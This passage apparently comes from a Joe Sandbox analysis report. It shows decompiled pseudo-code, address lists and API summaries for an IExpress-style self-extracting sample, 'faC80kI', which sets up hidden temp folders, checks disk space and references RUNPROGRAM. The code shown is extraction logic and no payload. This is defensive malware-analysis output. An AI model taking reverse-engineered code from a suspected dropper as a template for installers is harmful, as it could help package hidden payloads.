                                                                                                                                                                                                                                            																					}
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t60 = _v268 + 1;
                                                                                                                                                                                                                                            																					_v265 = 0;
                                                                                                                                                                                                                                            																					_v268 = _t60;
                                                                                                                                                                                                                                            																					goto L42;
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																			} else {
                                                                                                                                                                                                                                            																				_t65 = E00A92630(0,  &_v268, 1);
                                                                                                                                                                                                                                            																				__eflags = _t65;
                                                                                                                                                                                                                                            																				if(_t65 != 0) {
                                                                                                                                                                                                                                            																					goto L28;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t67 = E00A9597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                                                            																					__eflags = _t67;
                                                                                                                                                                                                                                            																					if(_t67 == 0) {
                                                                                                                                                                                                                                            																						goto L28;
                                                                                                                                                                                                                                            																					} else {
                                                                                                                                                                                                                                            																						goto L33;
                                                                                                                                                                                                                                            																					}
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																			}
                                                                                                                                                                                                                                            																		} else {
                                                                                                                                                                                                                                            																			goto L28;
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														goto L22;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												goto L47;
                                                                                                                                                                                                                                            												L42:
                                                                                                                                                                                                                                            												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                                                            											} while (_t60 <= 0x5a);
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										goto L43;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t101 = 1;
                                                                                                                                                                                                                                            										_t69 = E00A95467(0xa991e4, 1, 3); // executed
                                                                                                                                                                                                                                            										__eflags = _t69;
                                                                                                                                                                                                                                            										if(_t69 != 0) {
                                                                                                                                                                                                                                            											goto L45;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t82 = 0xa991e4;
                                                                                                                                                                                                                                            											_t70 = E00A92630(0, 0xa991e4, 1);
                                                                                                                                                                                                                                            											__eflags = _t70;
                                                                                                                                                                                                                                            											if(_t70 != 0) {
                                                                                                                                                                                                                                            												goto L19;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t101 = 1;
                                                                                                                                                                                                                                            												_t82 = 0xa991e4;
                                                                                                                                                                                                                                            												_t71 = E00A95467(0xa991e4, 1, 1);
                                                                                                                                                                                                                                            												__eflags = _t71;
                                                                                                                                                                                                                                            												if(_t71 != 0) {
                                                                                                                                                                                                                                            													goto L45;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													do {
                                                                                                                                                                                                                                            														goto L19;
                                                                                                                                                                                                                                            														L43:
                                                                                                                                                                                                                                            														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                            														_push(4);
                                                                                                                                                                                                                                            														_t101 = 3;
                                                                                                                                                                                                                                            														_t82 =  &_v268;
                                                                                                                                                                                                                                            														_t44 = E00A9597D(_t82, _t101, 1);
                                                                                                                                                                                                                                            														__eflags = _t44;
                                                                                                                                                                                                                                            													} while (_t44 != 0);
                                                                                                                                                                                                                                            													goto L2;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                                                            							if(_t35 != 0x5c) {
                                                                                                                                                                                                                                            								L10:
                                                                                                                                                                                                                                            								_t72 = 1;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								__eflags =  *0xa98b3f - _t35; // 0x0
                                                                                                                                                                                                                                            								_t72 = 0;
                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                            									goto L10;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t101 = 0;
                                                                                                                                                                                                                                            							_t73 = E00A95467(0xa98b3e, 0, _t72);
                                                                                                                                                                                                                                            							__eflags = _t73;
                                                                                                                                                                                                                                            							if(_t73 != 0) {
                                                                                                                                                                                                                                            								L45:
                                                                                                                                                                                                                                            								_t38 = 1;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t101 = 0x4be;
                                                                                                                                                                                                                                            								E00A944B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            								goto L2;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t101 = 0x4b1;
                                                                                                                                                                                                                                            						E00A944B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						LocalFree(_t109);
                                                                                                                                                                                                                                            						 *0xa99124 = 0x80070714;
                                                                                                                                                                                                                                            						goto L2;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t101 = 0x4b5;
                                                                                                                                                                                                                                            					E00A944B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					 *0xa99124 = E00A96285();
                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                            					_t38 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				L47:
                                                                                                                                                                                                                                            				return E00A96CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                                                            			}
                                                                                                                                                                                                                                            0x00a9569c
                                                                                                                                                                                                                                            0x00a9589f
                                                                                                                                                                                                                                            0x00a958a7
                                                                                                                                                                                                                                            0x00a958ac
                                                                                                                                                                                                                                            0x00a958b3
                                                                                                                                                                                                                                            0x00a958b5
                                                                                                                                                                                                                                            0x00a956a2
                                                                                                                                                                                                                                            0x00a956a2
                                                                                                                                                                                                                                            0x00a956a8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a956ae
                                                                                                                                                                                                                                            0x00a956ae
                                                                                                                                                                                                                                            0x00a956b9
                                                                                                                                                                                                                                            0x00a956bf
                                                                                                                                                                                                                                            0x00a956c1
                                                                                                                                                                                                                                            0x00a956f3
                                                                                                                                                                                                                                            0x00a956f3
                                                                                                                                                                                                                                            0x00a95705
                                                                                                                                                                                                                                            0x00a9570a
                                                                                                                                                                                                                                            0x00a95711
                                                                                                                                                                                                                                            0x00a95717
                                                                                                                                                                                                                                            0x00a95724
                                                                                                                                                                                                                                            0x00a95726
                                                                                                                                                                                                                                            0x00a95729
                                                                                                                                                                                                                                            0x00a95730
                                                                                                                                                                                                                                            0x00a95737
                                                                                                                                                                                                                                            0x00a9573d
                                                                                                                                                                                                                                            0x00a95740
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9572b
                                                                                                                                                                                                                                            0x00a9572b
                                                                                                                                                                                                                                            0x00a9572e
                                                                                                                                                                                                                                            0x00a95742
                                                                                                                                                                                                                                            0x00a95742
                                                                                                                                                                                                                                            0x00a95745
                                                                                                                                                                                                                                            0x00a9576b
                                                                                                                                                                                                                                            0x00a9576b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95747
                                                                                                                                                                                                                                            0x00a95747
                                                                                                                                                                                                                                            0x00a9574d
                                                                                                                                                                                                                                            0x00a9574f
                                                                                                                                                                                                                                            0x00a95771
                                                                                                                                                                                                                                            0x00a95771
                                                                                                                                                                                                                                            0x00a95773
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95751
                                                                                                                                                                                                                                            0x00a95751
                                                                                                                                                                                                                                            0x00a95753
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95755
                                                                                                                                                                                                                                            0x00a9575b
                                                                                                                                                                                                                                            0x00a95760
                                                                                                                                                                                                                                            0x00a95762
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95764
                                                                                                                                                                                                                                            0x00a95764
                                                                                                                                                                                                                                            0x00a95769
                                                                                                                                                                                                                                            0x00a9577e
                                                                                                                                                                                                                                            0x00a9577e
                                                                                                                                                                                                                                            0x00a95781
                                                                                                                                                                                                                                            0x00a95788
                                                                                                                                                                                                                                            0x00a9578d
                                                                                                                                                                                                                                            0x00a9578f
                                                                                                                                                                                                                                            0x00a957b2
                                                                                                                                                                                                                                            0x00a957b8
                                                                                                                                                                                                                                            0x00a957bd
                                                                                                                                                                                                                                            0x00a957bf
                                                                                                                                                                                                                                            0x00a957cd
                                                                                                                                                                                                                                            0x00a957cd
                                                                                                                                                                                                                                            0x00a957dd
                                                                                                                                                                                                                                            0x00a957e3
                                                                                                                                                                                                                                            0x00a957ef
                                                                                                                                                                                                                                            0x00a957f5
                                                                                                                                                                                                                                            0x00a957f8
                                                                                                                                                                                                                                            0x00a9580a
                                                                                                                                                                                                                                            0x00a9580a
                                                                                                                                                                                                                                            0x00a957fa
                                                                                                                                                                                                                                            0x00a95802
                                                                                                                                                                                                                                            0x00a95802
                                                                                                                                                                                                                                            0x00a9580d
                                                                                                                                                                                                                                            0x00a9580f
                                                                                                                                                                                                                                            0x00a95830
                                                                                                                                                                                                                                            0x00a95836
                                                                                                                                                                                                                                            0x00a9583d
                                                                                                                                                                                                                                            0x00a9584b
                                                                                                                                                                                                                                            0x00a95851
                                                                                                                                                                                                                                            0x00a95855
                                                                                                                                                                                                                                            0x00a9585a
                                                                                                                                                                                                                                            0x00a9585c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9585e
                                                                                                                                                                                                                                            0x00a9585e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9585e
                                                                                                                                                                                                                                            0x00a95811
                                                                                                                                                                                                                                            0x00a95817
                                                                                                                                                                                                                                            0x00a95819
                                                                                                                                                                                                                                            0x00a9581f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9581f
                                                                                                                                                                                                                                            0x00a95791
                                                                                                                                                                                                                                            0x00a95797
                                                                                                                                                                                                                                            0x00a9579c
                                                                                                                                                                                                                                            0x00a9579e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a957a0
                                                                                                                                                                                                                                            0x00a957a9
                                                                                                                                                                                                                                            0x00a957ae

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946A0
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: SizeofResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946A9
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946C3
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: LoadResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946CC
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: LockResource.KERNEL32(00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946D3
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: memcpy_s.MSVCRT ref: 00A946E5
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00A955CF
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00A95638
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00A9564C
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00A95620
                                                                                                                                                                                                                                              • Part of subcall function 00A944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
                                                                                                                                                                                                                                              • Part of subcall function 00A944B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A94554
                                                                                                                                                                                                                                              • Part of subcall function 00A96285: GetLastError.KERNEL32(00A95BBC), ref: 00A96285
                                                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00A956B9
                                                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00A9571E
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00A95737
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00A957CD
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00A957EF
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00A95802
                                                                                                                                                                                                                                              • Part of subcall function 00A92630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00A92654
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00A95830
                                                                                                                                                                                                                                              • Part of subcall function 00A96517: FindResourceA.KERNEL32(00A90000,000007D6,00000005), ref: 00A9652A
                                                                                                                                                                                                                                              • Part of subcall function 00A96517: LoadResource.KERNEL32(00A90000,00000000,?,?,00A92EE8,00000000,00A919E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A96538
                                                                                                                                                                                                                                              • Part of subcall function 00A96517: DialogBoxIndirectParamA.USER32(00A90000,00000000,00000547,00A919E0,00000000), ref: 00A96557
                                                                                                                                                                                                                                              • Part of subcall function 00A96517: FreeResource.KERNEL32(00000000,?,?,00A92EE8,00000000,00A919E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A96560
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00A95878
                                                                                                                                                                                                                                              • Part of subcall function 00A9597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00A959A8
                                                                                                                                                                                                                                              • Part of subcall function 00A9597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00A959AF
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            control_flow_graph 324 a9597d-a959b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 a959bb-a959d8 call a944b9 call a96285 324->325 326 a959dd-a95a1b GetDiskFreeSpaceA 324->326 343 a95c05-a95c14 call a96ce0 325->343 328 a95ba1-a95bde memset call a96285 GetLastError FormatMessageA 326->328 329 a95a21-a95a4a MulDiv 326->329 339 a95be3-a95bfc call a944b9 SetCurrentDirectoryA 328->339 329->328 332 a95a50-a95a6c GetVolumeInformationA 329->332 335 a95a6e-a95ab0 memset call a96285 GetLastError FormatMessageA 332->335 336 a95ab5-a95aca SetCurrentDirectoryA 332->336 335->339 337 a95acc-a95ad1 336->337 341 a95ad3-a95ad8 337->341 342 a95ae2-a95ae4 337->342 351 a95c02 339->351 341->342 347 a95ada-a95ae0 341->347 349 a95ae7-a95af8 342->349 350 a95ae6 342->350 347->337 347->342 353 a95af9-a95afb 349->353 350->349 354 a95c04 351->354 355 a95afd-a95b03 353->355 356 a95b05-a95b08 353->356 354->343 355->353 355->356 357 a95b0a-a95b1b call a944b9 356->357 358 a95b20-a95b27 356->358 357->351 360 a95b29-a95b33 358->360 361 a95b52-a95b5b 358->361 360->361 364 a95b35-a95b50 360->364 362 a95b62-a95b6d 361->362 365 a95b6f-a95b74 362->365 366 a95b76-a95b7d 362->366 364->362 367 a95b85 365->367 368 a95b7f-a95b81 366->368 369 a95b83 366->369 370 a95b87-a95b94 call a9268b 367->370 371 a95b96-a95b9f 367->371 368->367 369->367 370->354 371->354
                                                                                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                                                                                            			E00A9597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				char _v788;
                                                                                                                                                                                                                                            				long _v792;
                                                                                                                                                                                                                                            				long _v796;
                                                                                                                                                                                                                                            				long _v800;
                                                                                                                                                                                                                                            				signed int _v804;
                                                                                                                                                                                                                                            				long _v808;
                                                                                                                                                                                                                                            				int _v812;
                                                                                                                                                                                                                                            				long _v816;
                                                                                                                                                                                                                                            				long _v820;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                                            				int _t50;
                                                                                                                                                                                                                                            				signed int _t55;
                                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                                            				int _t69;
                                                                                                                                                                                                                                            				signed int _t73;
                                                                                                                                                                                                                                            				signed short _t78;
                                                                                                                                                                                                                                            				signed int _t87;
                                                                                                                                                                                                                                            				signed int _t101;
                                                                                                                                                                                                                                            				int _t102;
                                                                                                                                                                                                                                            				unsigned int _t103;
                                                                                                                                                                                                                                            				unsigned int _t105;
                                                                                                                                                                                                                                            				signed int _t111;
                                                                                                                                                                                                                                            				long _t112;
                                                                                                                                                                                                                                            				signed int _t116;
                                                                                                                                                                                                                                            				CHAR* _t118;
                                                                                                                                                                                                                                            				signed int _t119;
                                                                                                                                                                                                                                            				signed int _t120;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t114 = __edi;
                                                                                                                                                                                                                                            				_t46 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                                                            				_v804 = __edx;
                                                                                                                                                                                                                                            				_t118 = __ecx;
                                                                                                                                                                                                                                            				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                                                            				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                                                            				if(_t50 != 0) {
                                                                                                                                                                                                                                            					_push(__edi);
                                                                                                                                                                                                                                            					_v796 = 0;
                                                                                                                                                                                                                                            					_v792 = 0;
                                                                                                                                                                                                                                            					_v800 = 0;
                                                                                                                                                                                                                                            					_v808 = 0;
                                                                                                                                                                                                                                            					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                                                            					__eflags = _t55;
                                                                                                                                                                                                                                            					if(_t55 == 0) {
                                                                                                                                                                                                                                            						L29:
                                                                                                                                                                                                                                            						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                            						 *0xa99124 = E00A96285();
                                                                                                                                                                                                                                            						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                            						_t110 = 0x4b0;
                                                                                                                                                                                                                                            						L30:
                                                                                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                                                                                            						E00A944B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                                                            						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                                                            						L31:
                                                                                                                                                                                                                                            						_t66 = 0;
                                                                                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                                                                                            						L32:
                                                                                                                                                                                                                                            						_pop(_t114);
                                                                                                                                                                                                                                            						goto L33;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t69 = _v792 * _v796;
                                                                                                                                                                                                                                            					_v812 = _t69;
                                                                                                                                                                                                                                            					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                                                            					__eflags = _t116;
                                                                                                                                                                                                                                            					if(_t116 == 0) {
                                                                                                                                                                                                                                            						goto L29;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                                                            					__eflags = _t73;
                                                                                                                                                                                                                                            					if(_t73 != 0) {
                                                                                                                                                                                                                                            						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                                                            						_t101 =  &_v16;
                                                                                                                                                                                                                                            						_t111 = 6;
                                                                                                                                                                                                                                            						_t119 = _t118 - _t101;
                                                                                                                                                                                                                                            						__eflags = _t119;
                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                            							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                                                            							__eflags = _t22;
                                                                                                                                                                                                                                            							if(_t22 == 0) {
                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                                                            							__eflags = _t87;
                                                                                                                                                                                                                                            							if(_t87 == 0) {
                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							 *_t101 = _t87;
                                                                                                                                                                                                                                            							_t101 = _t101 + 1;
                                                                                                                                                                                                                                            							_t111 = _t111 - 1;
                                                                                                                                                                                                                                            							__eflags = _t111;
                                                                                                                                                                                                                                            							if(_t111 != 0) {
                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _t111;
                                                                                                                                                                                                                                            						if(_t111 == 0) {
                                                                                                                                                                                                                                            							_t101 = _t101 - 1;
                                                                                                                                                                                                                                            							__eflags = _t101;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *_t101 = 0;
                                                                                                                                                                                                                                            						_t112 = 0x200;
                                                                                                                                                                                                                                            						_t102 = _v812;
                                                                                                                                                                                                                                            						_t78 = 0;
                                                                                                                                                                                                                                            						_t118 = 8;
                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                            							__eflags = _t102 - _t112;
                                                                                                                                                                                                                                            							if(_t102 == _t112) {
                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t112 = _t112 + _t112;
                                                                                                                                                                                                                                            							_t78 = _t78 + 1;
                                                                                                                                                                                                                                            							__eflags = _t78 - _t118;
                                                                                                                                                                                                                                            							if(_t78 < _t118) {
                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _t78 - _t118;
                                                                                                                                                                                                                                            						if(_t78 != _t118) {
                                                                                                                                                                                                                                            							__eflags =  *0xa99a34 & 0x00000008;
                                                                                                                                                                                                                                            							if(( *0xa99a34 & 0x00000008) == 0) {
                                                                                                                                                                                                                                            								L20:
                                                                                                                                                                                                                                            								_t103 =  *0xa99a38; // 0x0
                                                                                                                                                                                                                                            								_t110 =  *((intOrPtr*)(0xa989e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                            								L21:
                                                                                                                                                                                                                                            								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                                                            								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                                                            									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                                                            									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            										__eflags = _t103 - _t116;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										__eflags = _t110 - _t116;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								if(__eflags <= 0) {
                                                                                                                                                                                                                                            									 *0xa99124 = 0;
                                                                                                                                                                                                                                            									_t66 = 1;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t66 = E00A9268B(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                                                            							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                                                            								goto L20;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t105 =  *0xa99a38; // 0x0
                                                                                                                                                                                                                                            							_t110 =  *((intOrPtr*)(0xa989e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xa989e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                            							_t103 = (_t105 >> 2) +  *0xa99a38;
                                                                                                                                                                                                                                            							goto L21;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t110 = 0x4c5;
                                                                                                                                                                                                                                            						E00A944B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						goto L31;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                            					 *0xa99124 = E00A96285();
                                                                                                                                                                                                                                            					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                            					_t110 = 0x4f9;
                                                                                                                                                                                                                                            					goto L30;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t110 = 0x4bc;
                                                                                                                                                                                                                                            					E00A944B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					 *0xa99124 = E00A96285();
                                                                                                                                                                                                                                            					_t66 = 0;
                                                                                                                                                                                                                                            					L33:
                                                                                                                                                                                                                                            					return E00A96CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                                            0x00a95aca
                                                                                                                                                                                                                                            0x00a95acc
                                                                                                                                                                                                                                            0x00a95acc
                                                                                                                                                                                                                                            0x00a95acf
                                                                                                                                                                                                                                            0x00a95ad1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95ad3
                                                                                                                                                                                                                                            0x00a95ad6
                                                                                                                                                                                                                                            0x00a95ad8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95ada
                                                                                                                                                                                                                                            0x00a95adc
                                                                                                                                                                                                                                            0x00a95add
                                                                                                                                                                                                                                            0x00a95add
                                                                                                                                                                                                                                            0x00a95ae0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95ae0
                                                                                                                                                                                                                                            0x00a95ae2
                                                                                                                                                                                                                                            0x00a95ae4
                                                                                                                                                                                                                                            0x00a95ae6
                                                                                                                                                                                                                                            0x00a95ae6
                                                                                                                                                                                                                                            0x00a95ae6
                                                                                                                                                                                                                                            0x00a95ae9
                                                                                                                                                                                                                                            0x00a95aeb
                                                                                                                                                                                                                                            0x00a95af0
                                                                                                                                                                                                                                            0x00a95af6
                                                                                                                                                                                                                                            0x00a95af8
                                                                                                                                                                                                                                            0x00a95af9
                                                                                                                                                                                                                                            0x00a95af9
                                                                                                                                                                                                                                            0x00a95afb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95afd
                                                                                                                                                                                                                                            0x00a95aff
                                                                                                                                                                                                                                            0x00a95b00
                                                                                                                                                                                                                                            0x00a95b03
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
